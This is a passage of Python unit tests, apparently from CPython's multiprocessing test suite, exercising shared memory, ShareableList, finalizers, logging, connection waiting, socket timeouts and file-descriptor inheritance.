self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
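# Illustrative sketch (added for clarity, never called by the tests): the
# create/attach/close/unlink lifecycle that _TestSharedMemory below exercises.
# Assumes multiprocessing.shared_memory is available (HAS_SHMEM); the
# ``_demo_shared_memory_lifecycle`` name is an assumption introduced here for
# illustration only.
def _demo_shared_memory_lifecycle():
    from multiprocessing import shared_memory
    creator = shared_memory.SharedMemory(create=True, size=16)
    try:
        creator.buf[:5] = b'hello'
        attached = shared_memory.SharedMemory(creator.name)   # attach to the same block by name
        data = bytes(attached.buf[:5])                        # b'hello'
        attached.close()
    finally:
        creator.close()
        creator.unlink()                                      # actually release the segment
    return data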
@unittest.skipUnless(HAS_SHMEM, "requires multiprocessing.shared_memory")
@hashlib_helper.requires_hashdigest('md5')
class _TestSharedMemory(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@staticmethod
def _attach_existing_shmem_then_write(shmem_name_or_obj, binary_data):
if isinstance(shmem_name_or_obj, str):
local_sms = shared_memory.SharedMemory(shmem_name_or_obj)
else:
local_sms = shmem_name_or_obj
local_sms.buf[:len(binary_data)] = binary_data
local_sms.close()
def test_shared_memory_basics(self):
sms = shared_memory.SharedMemory('test01_tsmb', create=True, size=512)
self.addCleanup(sms.unlink)
# Verify attributes are readable.
self.assertEqual(sms.name, 'test01_tsmb')
self.assertGreaterEqual(sms.size, 512)
self.assertGreaterEqual(len(sms.buf), sms.size)
# Modify contents of shared memory segment through memoryview.
sms.buf[0] = 42
self.assertEqual(sms.buf[0], 42)
# Attach to existing shared memory segment.
also_sms = shared_memory.SharedMemory('test01_tsmb')
self.assertEqual(also_sms.buf[0], 42)
also_sms.close()
# Attach to existing shared memory segment but specify a new size.
same_sms = shared_memory.SharedMemory('test01_tsmb', size=20*sms.size)
self.assertLess(same_sms.size, 20*sms.size) # Size was ignored.
same_sms.close()
        # Creating a shared memory segment with a negative size
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=True, size=-2)
        # Attaching to a shared memory segment without a name
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=False)
        # Test that the shared memory segment is created properly when
        # _make_filename returns an existing shared memory segment name.
with unittest.mock.patch(
'multiprocessing.shared_memory._make_filename') as mock_make_filename:
NAME_PREFIX = shared_memory._SHM_NAME_PREFIX
names = ['test01_fn', 'test02_fn']
            # Prepend NAME_PREFIX, which can be '/psm_' or 'wnsm_'; this is
            # necessary because some POSIX-compliant systems require the name
            # to start with /
names = [NAME_PREFIX + name for name in names]
mock_make_filename.side_effect = names
shm1 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm1.unlink)
self.assertEqual(shm1._name, names[0])
mock_make_filename.side_effect = names
shm2 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm2.unlink)
self.assertEqual(shm2._name, names[1])
if shared_memory._USE_POSIX:
# Posix Shared Memory can only be unlinked once. Here we
# test an implementation detail that is not observed across
# all supported platforms (since WindowsNamedSharedMemory
# manages unlinking on its own and unlink() does nothing).
# True release of shared memory segment does not necessarily
# happen until process exits, depending on the OS platform.
with self.assertRaises(FileNotFoundError):
sms_uno = shared_memory.SharedMemory(
'test01_dblunlink',
create=True,
size=5000
)
try:
self.assertGreaterEqual(sms_uno.size, 5000)
sms_duo = shared_memory.SharedMemory('test01_dblunlink')
sms_duo.unlink() # First shm_unlink() call.
sms_duo.close()
sms_uno.close()
finally:
sms_uno.unlink() # A second shm_unlink() call is bad.
with self.assertRaises(FileExistsError):
# Attempting to create a new shared memory segment with a
# name that is already in use triggers an exception.
there_can_only_be_one_sms = shared_memory.SharedMemory(
'test01_tsmb',
create=True,
size=512
)
if shared_memory._USE_POSIX:
# Requesting creation of a shared memory segment with the option
# to attach to an existing segment, if that name is currently in
# use, should not trigger an exception.
# Note: Using a smaller size could possibly cause truncation of
# the existing segment but is OS platform dependent. In the
# case of MacOS/darwin, requesting a smaller size is disallowed.
class OptionalAttachSharedMemory(shared_memory.SharedMemory):
_flags = os.O_CREAT | os.O_RDWR
ok_if_exists_sms = OptionalAttachSharedMemory('test01_tsmb')
self.assertEqual(ok_if_exists_sms.size, sms.size)
ok_if_exists_sms.close()
# Attempting to attach to an existing shared memory segment when
# no segment exists with the supplied name triggers an exception.
with self.assertRaises(FileNotFoundError):
nonexisting_sms = shared_memory.SharedMemory('test01_notthere')
nonexisting_sms.unlink() # Error should occur on prior line.
sms.close()
# Test creating a shared memory segment with negative size
with self.assertRaises(ValueError):
sms_invalid = shared_memory.SharedMemory(create=True, size=-1)
# Test creating a shared memory segment with size 0
with self.assertRaises(ValueError):
sms_invalid = shared_memory.SharedMemory(create=True, size=0)
# Test creating a shared memory segment without size argument
with self.assertRaises(ValueError):
sms_invalid = shared_memory.SharedMemory(create=True)
def test_shared_memory_across_processes(self):
        # bpo-40135: don't hard-code the shared memory block's name, so this
        # test does not fail when multiprocessing tests are run in parallel.
sms = shared_memory.SharedMemory(create=True, size=512)
self.addCleanup(sms.unlink)
# Verify remote attachment to existing block by name is working.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms.name, b'howdy')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'howdy')
# Verify pickling of SharedMemory instance also works.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms, b'HELLO')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'HELLO')
sms.close()
@unittest.skipIf(os.name != "posix", "not feasible in non-posix platforms")
def test_shared_memory_SharedMemoryServer_ignores_sigint(self):
# bpo-36368: protect SharedMemoryManager server process from
# KeyboardInterrupt signals.
smm = multiprocessing.managers.SharedMemoryManager()
smm.start()
# make sure the manager works properly at the beginning
sl = smm.ShareableList(range(10))
# the manager's server should ignore KeyboardInterrupt signals, and
        # maintain its connection with the current process, and succeed when
# asked to deliver memory segments.
os.kill(smm._process.pid, signal.SIGINT)
sl2 = smm.ShareableList(range(10))
# test that the custom signal handler registered in the Manager does
# not affect signal handling in the parent process.
with self.assertRaises(KeyboardInterrupt):
os.kill(os.getpid(), signal.SIGINT)
smm.shutdown()
@unittest.skipIf(os.name != "posix", "resource_tracker is posix only")
def test_shared_memory_SharedMemoryManager_reuses_resource_tracker(self):
# bpo-36867: test that a SharedMemoryManager uses the
# same resource_tracker process as its parent.
cmd = '''if 1:
from multiprocessing.managers import SharedMemoryManager
smm = SharedMemoryManager()
smm.start()
sl = smm.ShareableList(range(10))
smm.shutdown()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
# Before bpo-36867 was fixed, a SharedMemoryManager not using the same
# resource_tracker process as its parent would make the parent's
# tracker complain about sl being leaked even though smm.shutdown()
# properly released sl.
self.assertFalse(err)
def test_shared_memory_SharedMemoryManager_basics(self):
smm1 = multiprocessing.managers.SharedMemoryManager()
with self.assertRaises(ValueError):
smm1.SharedMemory(size=9) # Fails if SharedMemoryServer not started
smm1.start()
lol = [ smm1.ShareableList(range(i)) for i in range(5, 10) ]
lom = [ smm1.SharedMemory(size=j) for j in range(32, 128, 16) ]
doppleganger_list0 = shared_memory.ShareableList(name=lol[0].shm.name)
self.assertEqual(len(doppleganger_list0), 5)
doppleganger_shm0 = shared_memory.SharedMemory(name=lom[0].name)
self.assertGreaterEqual(len(doppleganger_shm0.buf), 32)
held_name = lom[0].name
smm1.shutdown()
if sys.platform != "win32":
            # Calls to unlink() have no effect on the Windows platform; shared
            # memory will only be released once the final process exits.
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_shm = shared_memory.SharedMemory(name=held_name)
with multiprocessing.managers.SharedMemoryManager() as smm2:
sl = smm2.ShareableList("howdy")
shm = smm2.SharedMemory(size=128)
held_name = sl.shm.name
if sys.platform != "win32":
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_sl = shared_memory.ShareableList(name=held_name)
def test_shared_memory_ShareableList_basics(self):
sl = shared_memory.ShareableList(
['howdy', b'HoWdY', -273.154, 100, None, True, 42]
)
self.addCleanup(sl.shm.unlink)
# Verify attributes are readable.
self.assertEqual(sl.format, '8s8sdqxxxxxx?xxxxxxxx?q')
# Exercise len().
self.assertEqual(len(sl), 7)
# Exercise index().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
with self.assertRaises(ValueError):
sl.index('100')
self.assertEqual(sl.index(100), 3)
# Exercise retrieving individual values.
self.assertEqual(sl[0], 'howdy')
self.assertEqual(sl[-2], True)
# Exercise iterability.
self.assertEqual(
tuple(sl),
('howdy', b'HoWdY', -273.154, 100, None, True, 42)
)
# Exercise modifying individual values.
sl[3] = 42
self.assertEqual(sl[3], 42)
sl[4] = 'some' # Change type at a given position.
self.assertEqual(sl[4], 'some')
self.assertEqual(sl.format, '8s8sdq8sxxxxxxx?q')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[4] = 'far too many'
self.assertEqual(sl[4], 'some')
sl[0] = 'encodés' # Exactly 8 bytes of UTF-8 data
self.assertEqual(sl[0], 'encodés')
self.assertEqual(sl[1], b'HoWdY') # no spillage
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[0] = 'encodées' # Exactly 9 bytes of UTF-8 data
self.assertEqual(sl[1], b'HoWdY')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[1] = b'123456789'
self.assertEqual(sl[1], b'HoWdY')
# Exercise count().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
self.assertEqual(sl.count(42), 2)
self.assertEqual(sl.count(b'HoWdY'), 1)
self.assertEqual(sl.count(b'adios'), 0)
# Exercise creating a duplicate.
sl_copy = shared_memory.ShareableList(sl, name='test03_duplicate')
try:
self.assertNotEqual(sl.shm.name, sl_copy.shm.name)
self.assertEqual('test03_duplicate', sl_copy.shm.name)
self.assertEqual(list(sl), list(sl_copy))
self.assertEqual(sl.format, sl_copy.format)
sl_copy[-1] = 77
self.assertEqual(sl_copy[-1], 77)
self.assertNotEqual(sl[-1], 77)
sl_copy.shm.close()
finally:
sl_copy.shm.unlink()
# Obtain a second handle on the same ShareableList.
sl_tethered = shared_memory.ShareableList(name=sl.shm.name)
self.assertEqual(sl.shm.name, sl_tethered.shm.name)
sl_tethered[-1] = 880
self.assertEqual(sl[-1], 880)
sl_tethered.shm.close()
sl.shm.close()
# Exercise creating an empty ShareableList.
empty_sl = shared_memory.ShareableList()
try:
self.assertEqual(len(empty_sl), 0)
self.assertEqual(empty_sl.format, '')
self.assertEqual(empty_sl.count('any'), 0)
with self.assertRaises(ValueError):
empty_sl.index(None)
empty_sl.shm.close()
finally:
empty_sl.shm.unlink()
def test_shared_memory_ShareableList_pickling(self):
sl = shared_memory.ShareableList(range(10))
self.addCleanup(sl.shm.unlink)
serialized_sl = pickle.dumps(sl)
deserialized_sl = pickle.loads(serialized_sl)
self.assertTrue(
isinstance(deserialized_sl, shared_memory.ShareableList)
)
        self.assertEqual(deserialized_sl[-1], 9)
self.assertFalse(sl is deserialized_sl)
deserialized_sl[4] = "changed"
self.assertEqual(sl[4], "changed")
# Verify data is not being put into the pickled representation.
name = 'a' * len(sl.shm.name)
larger_sl = shared_memory.ShareableList(range(400))
self.addCleanup(larger_sl.shm.unlink)
serialized_larger_sl = pickle.dumps(larger_sl)
self.assertTrue(len(serialized_sl) == len(serialized_larger_sl))
larger_sl.shm.close()
deserialized_sl.shm.close()
sl.shm.close()
def test_shared_memory_cleaned_after_process_termination(self):
cmd = '''if 1:
import os, time, sys
from multiprocessing import shared_memory
# Create a shared_memory segment, and send the segment name
sm = shared_memory.SharedMemory(create=True, size=10)
sys.stdout.write(sm.name + '\\n')
sys.stdout.flush()
time.sleep(100)
'''
with subprocess.Popen([sys.executable, '-E', '-c', cmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as p:
name = p.stdout.readline().strip().decode()
            # abruptly killing a process that holds a reference to a shared
            # memory segment should not leak that segment.
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
t = 0.1
while time.monotonic() < deadline:
time.sleep(t)
t = min(t*2, 5)
try:
smm = shared_memory.SharedMemory(name, create=False)
except FileNotFoundError:
break
else:
raise AssertionError("A SharedMemory segment was leaked after"
" a process was abruptly terminated.")
if os.name == 'posix':
# A warning was emitted by the subprocess' own
# resource_tracker (on Windows, shared memory segments
# are released automatically by the OS).
err = p.stderr.read().decode()
self.assertIn(
"resource_tracker: There appear to be 1 leaked "
"shared_memory objects to clean up at shutdown", err)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(glob.escape(folder), '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
@hashlib_helper.requires_hashdigest('md5')
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
@hashlib_helper.requires_hashdigest('md5')
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.create_server((socket_helper.HOST, 0))
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
